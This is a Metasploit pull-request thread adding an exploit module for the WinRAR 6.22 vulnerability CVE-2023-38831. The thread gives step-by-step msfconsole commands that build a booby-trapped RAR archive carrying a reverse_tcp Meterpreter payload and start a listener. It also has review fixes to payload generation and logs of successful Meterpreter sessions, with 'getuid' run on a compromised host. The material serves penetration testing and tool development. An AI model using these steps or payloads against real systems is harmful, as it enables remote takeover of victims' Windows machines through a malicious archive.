WinRAR 6.22 (CVE-2023-38831)
rapid7/metasploit-framework pull request #18341
Opened 2023-09-04 17:10 UTC by xaitax

## Verification

- [x] Start `msfconsole`
- [x] Do: `use exploit/windows/fileformat/winrar_cve_2023_38831`
- [x] Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] Do: `set LHOST 192.168.100.100`
- [x] Do: `set LPORT 1234`
- [x] Do: `set INPUT_FILE /tmp/winrar_exploit.pdf`
- [ ] Do: `exploit`

`[+] Created /root/.msf4/local/poc.rar`

- [x] Start `msfconsole`
- [x] Do: `use exploit/multi/handler`
- [x] Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
- [x] Do: `set LHOST 192.168.100.100`
- [x] Do: `set LPORT 1234`
- [x] Do: `run`

Target:

- [x] Install WinRAR 6.22 on Windows 10/11
- [x] Open OUTPUT_FILE
- [x] Click on INPUT_FILE within archive
- [x] Enjoy Shell

PoC:

![](https://github.com/xaitax/WinRAR-CVE-2023-38831/blob/main/winrar_cve-2023-38831.gif?raw=true)

2023-09-04 17:19 UTC, adfoster-r7 commented on modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
> +    temp_dir = Dir.mktmpdir
I believe the block version will do cleanup for you automagically:

> If a block is given, it is yielded with the path of the directory. The directory and its contents are removed using FileUtils.remove_entry before [Dir.mktmpdir](https://ruby-doc.org/stdlib-2.5.1/libdoc/tmpdir/rdoc/Dir.html#method-c-mktmpdir) returns. The value of the block is returned.

```
Dir.mktmpdir do |temp_dir|
  # ...
end
```

Unless there's benefits to using `FileUtils.remove_entry_secure(temp_dir)` over the default `remove_entry` behavior here?

2023-09-04 17:59 UTC, xaitax commented on modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
> +    temp_dir = Dir.mktmpdir
Not really a benefit. Will remove it then. I just didn't know better. :)

2023-09-04 18:28 UTC, xaitax commented
Linting should be fixed as well working with `Dir.mktmpdir do |temp_dir|`

2023-09-07 13:59 UTC, bwatters-r7 commented on modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
> +          'Space' => 4096,
Are we space constrained?

2023-09-07 14:06 UTC, xaitax commented on modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
> +          'Space' => 4096,
Thank you @bwatters-r7 . Good point. I don't think so. In the beginning I put it in to be on the safe side but looking at the research we probably aren't. I can take it out and re-test if you want.

2023-09-07 18:01 UTC, xaitax commented
@bwatters-r7 Confirmed it to be still working with the same options/settings as before but payload space removed. Thanks for the hint.

```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 46.165.244.xxx:1234
[*] Sending stage (175686 bytes) to 178.238.172.xxx
[*] Meterpreter session 1 opened (46.165.244.xxx:1234 -> 178.238.172.xxx:41032) at 2023-09-07 19:58:46 +0200

meterpreter > getuid
Server username: W00T\ah
```

2023-09-07 19:40 UTC, bwatters-r7 requested changes
I realized the way you'd written this created a malformed 64-bit payload, so it crashed when you used a 64-bit payload.  These changes will allow the module to properly create and deploy a 64-bit payload and let it autocomplete 64-bit payload names when you go to set them.

2023-09-07 19:40 UTC, bwatters-r7 commented on modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
> +
```suggestion
  include Msf::Exploit::EXE
  
```

2023-09-07 19:40 UTC, bwatters-r7 commented on modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
> +        'Targets' => [['Windows', {}]],
```suggestion
        'Arch' => [ ARCH_X64, ARCH_X86 ],
        'Targets' => [['Windows', {}]],
```

2023-09-07 19:40 UTC, bwatters-r7 commented on modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
> +      File.open(payload_path, 'wb') { |file| file.write(exe_payload) }
```suggestion
      File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }
```

2023-09-07 19:40 UTC, bwatters-r7 commented on modules/exploits/windows/fileformat/winrar_cve_2023_38831.rb
> +      exe_payload = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
```suggestion
```

2023-09-07 20:04 UTC, xaitax commented
Much appreciated @bwatters-r7 
Works for me on x64 as well now. Sorry for not testing that earlier.

```
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     46.165.244.xxx   yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 46.165.244.xxx:1234
[*] Sending stage (200774 bytes) to 178.238.172.xxx
[*] Meterpreter session 1 opened (46.165.244.xxx:1234 -> 178.238.172.xxx:49080) at 2023-09-07 22:01:33 +0200

meterpreter > getuid
Server username: W00T\ah
```

2023-09-07 20:34 UTC, bwatters-r7 commented
No problem, @xaitax.  Everything looks great.

2023-09-07 21:00 UTC, merged

2023-09-07 21:12 UTC, bwatters-r7 commented
# Release Notes
This PR adds a module covering CVE-2023-38831, a fileformat vulnerability affecting Winrar 6.22.